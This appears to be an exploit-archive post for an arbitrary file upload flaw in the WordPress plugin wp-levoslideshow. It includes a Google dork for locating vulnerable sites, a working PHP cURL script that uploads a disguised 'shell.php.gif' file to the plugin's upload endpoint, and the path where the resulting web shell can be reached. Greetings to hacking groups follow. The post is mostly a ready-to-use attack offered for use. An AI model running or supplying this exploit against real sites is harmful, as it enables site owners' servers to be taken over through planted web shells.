-----------------------------------------------------------------------
Wordpress plugins => wp-levoslideshow Arbitrary File Upload Vulnerability
-----------------------------------------------------------------------
#####
# Author => Zikou-16
# E-mail => zikou16x@gmail.com
# Facebook => http://fb.me/Zikou.se
# Google Dork => inurl:"/wp-content/plugins/wp-levoslideshow/"
# Tested on : Windows 7 , Backtrack 5r3
# Download plugin : http://wordpress.org/extend/plugins/wp-levoslideshow/
####
#=> Exploit Info :
------------------
# The attacker can uplaod file/shell.php.gif
------------------
-----------
#=> Exploit
-----------
<?php
$uploadfile="zik.php.gif";
$ch = curl_init("http://[target]/[path]/wp-content/plugins/wp-levoslideshow/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/levoslideshow/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://[target]/[path]/wp-content/uploads/levoslideshow/random_name.php.gif
<?php
phpinfo();
?>
------------------------------
Greet'z To #=> KedAns-Dz - JIGsaw - Elite Trojan - Anonymous Algeria - DZMafia & All Inj3ct0r Member <= Th3 End ^_^
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information